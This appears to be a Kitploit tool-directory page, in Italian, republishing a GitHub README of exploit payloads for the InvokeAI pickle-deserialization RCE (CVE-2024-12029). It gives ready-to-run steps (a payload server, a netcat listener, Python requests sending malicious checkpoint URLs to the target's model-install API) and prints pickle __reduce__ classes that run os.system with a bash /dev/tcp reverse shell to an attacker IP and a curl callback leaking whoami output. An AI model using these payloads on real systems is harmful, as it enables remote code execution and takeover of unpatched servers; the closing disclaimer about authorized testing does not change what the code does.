Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Alternative-Approach-Reverse-Shell-Callback-Test-InvokeAI-RCE — This repository contains alternative payload approaches for the InvokeAI RCE vulnerability (CVE-2024-12029) when SSH key injection fails. The payloads are designed to test if pickle deserialization is actually occurring and provide alternative access methods. | Kitploit
Strumenti/GitHubGitHub/lu3ky13/alternative-approach-reverse-shell-callback-test-invokeai-rce
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlLearning & EducationRemote Access ToolPayload Development

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitHub
lu3ky13/alternative-approach-reverse-shell-callback-test-invokeai-rce

Alternative-Approach-Reverse-Shell-Callback-Test-InvokeAI-RCE

This repository contains alternative payload approaches for the InvokeAI RCE vulnerability (CVE-2024-12029) when SSH key injection fails. The payloads are designed to test if pickle deserialization is actually occurring and provide alternative access methods.

Vedi Repository
4 mesi faNon ancora revisionato

Alternative-Approach-Reverse-Shell-Callback-Test-InvokeAI-RCE

Approccio Alternativo: Reverse Shell e Test del Callback

Panoramica

Questo repository contiene approcci alternativi di payload per la vulnerabilità RCE di InvokeAI (CVE-2024-12029) quando l'iniezione della chiave SSH fallisce. I payload sono progettati per verificare se la deserializzazione pickle sta effettivamente avvenendo e per fornire metodi di accesso alternativi.

Descrizione del Problema

Quando i payload di iniezione della chiave SSH vengono consegnati correttamente (Status 201) ma l'accesso SSH richiede ancora la password, ciò indica che:

  1. La deserializzazione pickle non sta avvenendo
  2. I comandi vengono bloccati/sandboxed
  3. Il metodo di esecuzione è incompatibile

Soluzione: Payload Alternativi

📁 File dei Payload

Payload Reverse Shell

  • payload_reverse_bash.ckpt (89 byte) - reverse shell Bash
  • payload_reverse_python.ckpt (267 byte) - reverse shell Python
  • payload_reverse_nc.ckpt (70 byte) - reverse shell Netcat

Payload di Test e Verifica

  • payload_callback_test.ckpt (115 byte) - callback HTTP per verificare la deserializzazione
  • payload_test.ckpt (90 byte) - semplice test di creazione file
  • payload_alt_exec.ckpt (223 byte) - metodo di esecuzione alternativo

Payload SSH (per riferimento)

  • payload_ssh_simple.ckpt (271 byte) - iniezione di chiave SSH compatibile con Linux

🛠️ Script di Test

Script di Test per Kali

  • kali_reverse_test.py - Suite di test completa

Generatori di Payload

  • reverse_shell_payload.py - Genera payload reverse shell

🚀 Utilizzo Rapido

1. Avvia il Server dei Payload

root@kitploit:~
python web_server.py --port 8000

2. Test del Callback (Consigliato per Primo)

root@kitploit:~
# Copy kali_reverse_test.py to Kali and run:
python3 kali_reverse_test.py
# Choose option 1 to test callback

3. Test della Reverse Shell

root@kitploit:~
# Start listener on Kali:
nc -lvnp 4444

# Send reverse shell payload:
python3 -c "import requests; requests.post('http://192.168.117.218:9090/api/v2/models/install', params={'source': 'http://192.168.45.168:8000/payload_reverse_bash.ckpt', 'inplace': 'true'}, json={})"

4. Test dell'Esecuzione Semplice

root@kitploit:~
# Test basic command execution:
python3 -c "import requests; requests.post('http://192.168.117.218:9090/api/v2/models/install', params={'source': 'http://192.168.45.168:8000/payload_test.ckpt', 'inplace': 'true'}, json={})"

# Verify file creation:
ssh [email protected] 'cat /tmp/payload_test.txt'

📊 Interpretazione dei Risultati dei Test

✅ Successo del Test del Callback

  • Cosa significa: La deserializzazione pickle sta funzionando
  • Prossimo passo: Prova la reverse shell o payload SSH alternativi
  • Verifica: I log del server web per il callback HTTP

✅ Successo della Reverse Shell

  • Cosa significa: I comandi vengono eseguiti e l'accesso alla rete funziona
  • Risultato: Accesso diretto alla shell tramite il listener netcat
  • Prossimo passo: Usa la reverse shell per ulteriori exploit

✅ File di Test Creato

  • Cosa significa: L'esecuzione di base dei comandi funziona
  • Prossimo passo: Prova metodi alternativi di iniezione SSH
  • Verifica: /tmp/payload_test.txt sul target

Payload del Callback

root@kitploit:~
class CallbackTestPayload:
    def __reduce__(self):
        import os
        command = 'curl "http://192.168.45.168:8000/callback?success=1&user=$(whoami)"'
        return (os.system, (command,))

Payload della Reverse Shell

root@kitploit:~
class ReverseShellPayload:
    def __reduce__(self):
        import os
        command = f'bash -c "bash -i >& /dev/tcp/192.168.45.168/4444 0>&1"'
        return (os.system, (command,))

Payload di Test

root@kitploit:~
class TestPayload:
    def __reduce__(self):
        import os
        return (os.system, ('echo "PAYLOAD_EXECUTED_$(date)" > /tmp/payload_test.txt',))

📚 Riferimenti

  • CVE-2024-12029: Esecuzione di codice remota in InvokeAI
  • Deserializzazione non sicura di PyTorch: vulnerabilità di torch.load()
  • Pickle reduce: sfruttamento della serializzazione di oggetti Python

⚠️ Disclaimer

Questo repository è destinato esclusivamente a scopi educativi e di test di sicurezza autorizzati. Gli utenti sono responsabili di garantire di disporre della corretta autorizzazione prima di testare qualsiasi sistema.

Scarica lo strumento